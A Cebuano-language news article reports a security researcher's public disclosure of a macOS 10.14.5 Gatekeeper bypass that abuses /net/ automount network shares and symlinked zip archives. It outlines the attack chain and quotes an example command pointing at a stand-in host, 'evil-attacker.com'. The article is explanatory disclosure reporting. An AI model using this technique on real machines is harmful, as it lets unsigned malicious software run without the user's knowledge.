Amaya Toman Ang tigdukiduki sa seguridad nga si Filippo Cavallarin nag-post usa ka pasidaan bahin sa bug sa macOS 10.14.5 sa iyang blog. Naglangkob kini sa posibilidad sa hingpit nga pag-bypass sa mga lakang sa seguridad sa Gatekeeper. Sumala sa Cavallarin, iyang gipunting ang sayup sa Apple kaniadtong Pebrero ning tuiga, apan wala kini giayo sa kompanya sa labing bag-ong update.
Ang Gatekeeper gimugna sa Apple ug gilakip sa desktop operating system niini sa unang higayon niadtong 2012. Usa kini ka mekanismo nga nagpugong sa usa ka aplikasyon sa pagdagan nga walay kahibalo ug pagtugot sa user. Human nimo i-download ang usa ka app, awtomatik nga susihon sa Gatekeeper ang code niini aron makita kung ang software gipirmahan ba sa Apple.
Mahimo nga interes nimo
Sa iyang blog post, si Cavallarin nag-ingon nga ang Gatekeeper, sa default, nag-isip sa external storage ug network shares nga luwas nga mga lokasyon. Ang bisan unsang aplikasyon nga nagpuyo sa kini nga mga target mahimo nga awtomatiko nga ilunsad nga dili kinahanglan nga moagi sa tseke sa Gatekeeper. Kini mao ang bahin nga mahimong mapahimuslan sa paglansad sa malisyosong software nga walay kahibalo sa user.
Usa ka aspeto nga nagtugot sa dili awtorisado nga pag-access mao ang automount feature, nga nagtugot sa mga tiggamit sa awtomatikong pag-mount sa usa ka network share pinaagi lamang sa pagtino sa usa ka dalan nga nagsugod sa "/net/". Ingon pananglitan, gikutlo ni Cavallarin ang dalan nga "ls /net/evil-attacker.com/sharedfolder/" nga mahimong hinungdan nga ang operating system magkarga sa mga sulud sa usa ka folder nga "sharefolder" sa usa ka hilit nga lokasyon nga mahimo’g makadaot.
Mahimo nimong tan-awon kung giunsa ang paglihok sa hulga sa video:
Ang laing hinungdan mao ang kamatuoran nga kung ang usa ka zip archive nga adunay usa ka piho nga symlink nga padulong sa automount function gipaambit, dili kini susihon sa Gatekeeper. Niining paagiha, dali nga ma-download sa biktima ang malisyoso nga archive ug i-unzip kini, nga gitugotan ang tig-atake nga modagan ang halos bisan unsang software sa Mac nga wala nahibal-an sa tiggamit. Ang Finder, nga nagtago sa pipila ka mga extension pinaagi sa default, adunay usab bahin niini nga pagkahuyang.
Gipahayag ni Cavallarin sa iyang blog nga gipunting sa Apple ang atensyon sa pagkahuyang sa macOS operating system kaniadtong Pebrero 22 ning tuiga. Apan sa tunga-tunga sa Mayo, ang Apple mihunong sa pagpakigsulti sa Cavallarin, mao nga nakahukom si Cavallarin nga ipahibalo ang tibuok nga butang.
Source: FCVL
